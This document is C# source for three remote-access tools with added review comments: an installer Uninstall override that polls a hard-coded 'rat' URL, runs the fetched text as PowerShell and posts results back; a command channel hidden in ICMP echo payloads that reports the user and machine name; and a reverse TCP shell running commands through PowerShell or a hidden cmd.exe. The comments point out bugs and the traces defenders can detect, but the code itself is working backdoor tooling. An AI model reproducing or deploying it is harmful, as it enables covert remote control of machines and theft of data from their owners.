    // The overridden method can be Uninstall or Install; Install is transactional, and really unnecessary.
    /// <summary>
    /// Installer override that never returns: it loops forever fetching text from a fixed
    /// HTTP URL, passing it to <c>Pshell.RunPSCommand</c> (defined elsewhere in the project),
    /// and posting the result back to the same URL. In effect it is a remote command channel
    /// that starts whenever the hosting installer's uninstall path runs.
    /// </summary>
    /// <param name="savedState">State handed in by the installer framework; never read here.</param>
    /// <remarks>
    /// Review notes: the loop has no delay, so the endpoint is polled as fast as round-trips
    /// allow; the URL is plain HTTP and hard-coded (loopback in this listing, presumably a
    /// placeholder); errors are reported to the same endpoint rather than logged locally.
    /// From a defender's view the observable artefact is an installer-hosted process issuing
    /// a continuous stream of GET/POST requests to one fixed path.
    /// </remarks>
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        // Never disposed; it lives for the whole (unbounded) loop below.
        WebClient w = new WebClient();

        // Unbounded: nothing inside the loop ever breaks or returns.
        while (true)
        {
            try{
                // Whatever the endpoint serves is treated as a command verbatim.
                string r       = w.DownloadString("http://127.0.0.1/rat");
                // Execution is delegated to the project's PowerShell helper (behaviour assumed from its name).
                string results = Pshell.RunPSCommand(r);
                // Command output is posted back to the same endpoint.
                w.UploadString("http://127.0.0.1/rat", results);
            }
            catch (Exception e)
            {
                // The error text is sent to the endpoint too; this upload is not guarded,
                // so a failure here propagates out of Uninstall and ends the loop.
                w.UploadString("http://127.0.0.1/rat", e.Message);
            }
        }
    }
        /// <summary>
        /// Console entry point for a command channel carried over ICMP echo. <c>args[0]</c>
        /// is the peer host; the program sends echo requests whose payload is text and reads
        /// commands out of the echo reply payload, so the peer has to be something that answers
        /// with a crafted reply rather than a normal ICMP stack (which mirrors the request).
        /// Commands go through <c>Pshell.RunPSCommand</c> (defined elsewhere) and the output is
        /// returned in 128-byte pieces, one per echo request.
        /// </summary>
        /// <param name="args">Only one value is used: the peer host name or address.</param>
        /// <remarks>
        /// Review notes: <c>reply.Status</c> is never checked, so a timed-out or failed echo is
        /// handled like an empty reply (assuming Buffer is empty in that case); the output
        /// chunks use a 600 s timeout (60 * 10000) while every other send uses 60 s, which looks
        /// like a typo rather than intent. For defenders, echo requests carrying ASCII text
        /// instead of the default ping pattern, and replies whose payload differs from the
        /// request, are what distinguish this traffic from ordinary ping.
        /// </remarks>
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("IP is required [!]");
                Environment.Exit(1);
            }
            string who        = args[0];
            // Maximum payload per echo request when returning command output.
            int    bufferSize = 128;
            // Set up the ICMP client
            Ping        icmpClient = new Ping();
            PingOptions pingOpts   = new PingOptions();

            pingOpts.DontFragment = true;
            // First payload: the account and machine the program runs under, from environment variables.
            string connectString = ("Running as " + Environment.GetEnvironmentVariable("username") + " on " + Environment.GetEnvironmentVariable("computername"));

            byte[] connectBytes = Encoding.ASCII.GetBytes(connectString);
            // 60 * 1000 ms = 60 s timeout per echo.
            icmpClient.Send(who, 60 * 1000, connectBytes, pingOpts);

            // Send the prompt
            string promptString = ("\nPS " + Directory.GetCurrentDirectory() + "> ");

            byte[] promptBytes = Encoding.ASCII.GetBytes(promptString);
            icmpClient.Send(who, 60 * 1000, promptBytes, pingOpts);

            while (true)
            {
                // Poll with an empty payload; the reply payload, if any, is the next command.
                string    sendString = "";
                byte[]    sendBytes  = Encoding.ASCII.GetBytes(sendString);
                PingReply reply      = icmpClient.Send(who, 60 * 1000, sendBytes, pingOpts);

                if (reply.Buffer.Length > 0)
                {
                    string response    = Encoding.ASCII.GetString(reply.Buffer);
                    string result      = Pshell.RunPSCommand(response);
                    byte[] returnBytes = Encoding.ASCII.GetBytes(result);

                    // Number of full bufferSize-byte chunks; kept as decimal, so `i < index` below
                    // compares an int against a decimal (implicit widening, works as intended).
                    decimal index = Math.Floor((decimal)returnBytes.Length / bufferSize);
                    int     i     = 0;
                    // Split the output into small buffers
                    if (returnBytes.Length > bufferSize)
                    {
                        while (i < index)
                        {
                            byte[] byteChunk = new byte[bufferSize];
                            Array.Copy(returnBytes, i * bufferSize, byteChunk, 0, bufferSize);
                            // NOTE(review): 60 * 10000 ms here, unlike the 60 * 1000 used elsewhere.
                            icmpClient.Send(who, 60 * 10000, byteChunk, pingOpts);
                            i++;
                        }
                        // Trailing partial chunk when the length is not a multiple of bufferSize.
                        int remainingIndex = returnBytes.Length % bufferSize;
                        if (remainingIndex != 0)
                        {
                            byte[] byteChunk = new byte[remainingIndex];
                            Array.Copy(returnBytes, i * bufferSize, byteChunk, 0, remainingIndex);
                            icmpClient.Send(who, 60 * 10000, byteChunk, pingOpts);
                        }
                    }
                    else
                    {
                        // Output fits in one payload (<= bufferSize bytes, including empty output).
                        icmpClient.Send(who, 60 * 10000, returnBytes, pingOpts);
                    }
                    // Prompt again after each command's output.
                    icmpClient.Send(who, 60 * 1000, promptBytes, pingOpts);
                }
                else
                {
                    // Nothing pending: back off before the next poll.
                    Thread.Sleep(2000);
                }
            }
        }
        /// <summary>
        /// Console entry point that opens an outbound TCP connection to <c>args[0]:args[1]</c>,
        /// sends a banner (current username and computername from the environment plus usage
        /// hints) and then services commands read from that connection: a "psh " prefix routes
        /// the rest to <c>Pshell.RunPSCommand</c> (defined elsewhere), "exit\n" ends the loop,
        /// and anything else is handed to <c>cmd.exe /C</c> with its output written back.
        /// </summary>
        /// <param name="args">Host and port; the port goes through <c>Convert.ToInt32</c>, so a
        /// non-numeric value throws and lands in the catch-all at the bottom.</param>
        /// <remarks>
        /// Review notes: <c>client.ReceiveBufferSize</c> is the socket buffer-size option, not the
        /// number of bytes waiting, so the guard at the top of the loop is effectively always true
        /// and each iteration performs one blocking Read. The Read return value is ignored, so a
        /// peer that closes the connection yields an all-zero buffer, an empty command, and a
        /// <c>cmd.exe /C</c> spawn per iteration until a Write fails. Every failure is swallowed by
        /// the empty catch, and the TcpClient is only closed on the "exit" path. For defenders the
        /// durable artefacts are the outbound plaintext connection and the hidden <c>cmd.exe /C</c>
        /// children with redirected output spawned by this process.
        /// </remarks>
        static void Main(string[] args)
        {
            try
            {
                if (args.Length != 2)
                {
                    Console.WriteLine("[!] No arguments, enter a host and a port");
                    System.Environment.Exit(-1);
                }

                string server = args[0];
                int    port   = Convert.ToInt32(args[1]);

                // create client and stream (outbound connect; no using, so the exception path never closes it)
                TcpClient     client = new TcpClient(server, port);
                NetworkStream stream = client.GetStream();
                // send connection string: identifies the account and host, then lists the two control words
                string connectString = ("[*] running as " + Environment.GetEnvironmentVariable("username")
                                        + " on " + Environment.GetEnvironmentVariable("computername")
                                        + "\n[+] prepend \"psh \" to use PowerShell runspace"
                                        + "\n[+] use \"exit\" to quit\n");
                byte[] connectBytes = Encoding.ASCII.GetBytes(connectString);
                stream.Write(connectBytes, 0, connectBytes.Length);
                stream.Flush();
                // send prompt
                string promptString = ("\nshell> ");
                byte[] promptBytes  = Encoding.ASCII.GetBytes(promptString);
                stream.Write(promptBytes, 0, promptBytes.Length);
                stream.Flush();

                while (true)
                {
                    if (client.ReceiveBufferSize > 0) // author's note: "either be 0 or 65536" -- this is the buffer-size option, so effectively always true
                    {
                        // convert buffer to string, trim trailing null bytes before passing to runspace
                        byte[] data = new Byte[client.ReceiveBufferSize];
                        // Blocking read; the byte count it returns is discarded (0 on peer close is not detected).
                        stream.Read(data, 0, client.ReceiveBufferSize);
                        // Any trailing newline sent by the peer is kept (see the "exit\n" comparison below).
                        string command = Encoding.ASCII.GetString(data).TrimEnd('\0');
                        // run command and get result, append prompt, convert to bytes and send back

                        // run powershell command
                        // NOTE(review): StartsWith without a StringComparison is culture-sensitive.
                        if (command.StartsWith("psh "))
                        {
                            command = command.Substring(4); // cut "psh "
                            string result = Pshell.RunPSCommand(command);
                            result += promptString;
                            byte[] returnBytes = Encoding.ASCII.GetBytes(result);
                            stream.Write(returnBytes, 0, returnBytes.Length);
                            stream.Flush();
                        }
                        // exit if asked (exact match including the newline)
                        else if (command == "exit\n")
                        {
                            break;
                        }
                        // otherwise just use cmd (code is everywhere)
                        else
                        {
                            // Hidden cmd.exe child with the received text as its /C argument and both output streams captured.
                            Process cmdProcess = new Process();
                            cmdProcess.StartInfo.WindowStyle            = System.Diagnostics.ProcessWindowStyle.Hidden;
                            cmdProcess.StartInfo.CreateNoWindow         = true;
                            cmdProcess.StartInfo.FileName               = "cmd.exe";
                            cmdProcess.StartInfo.Arguments              = "/C " + command;
                            cmdProcess.StartInfo.RedirectStandardOutput = true;
                            cmdProcess.StartInfo.RedirectStandardError  = true;
                            cmdProcess.StartInfo.UseShellExecute        = false;
                            cmdProcess.Start();
                            // NOTE(review): sequential ReadToEnd on both redirected streams can block if the
                            // child fills the stderr pipe before stdout reaches EOF; the process is never disposed.
                            string output = cmdProcess.StandardOutput.ReadToEnd()
                                            + cmdProcess.StandardError.ReadToEnd() + promptString;
                            // Encoding.Default here, unlike the ASCII used for every other write.
                            byte[] outputBytes = Encoding.Default.GetBytes(output);
                            stream.Write(outputBytes, 0, outputBytes.Length);
                            stream.Flush();
                        }
                    }
                }
                // Only reached via "exit"; an exception anywhere above skips this.
                client.Close();
            }
            catch
            {
                // not for prod obviously
                //Console.WriteLine("[!] error!");
                // Catch-all with no logging: connection failures, bad port values and I/O errors all exit silently.
                ;
            }
        }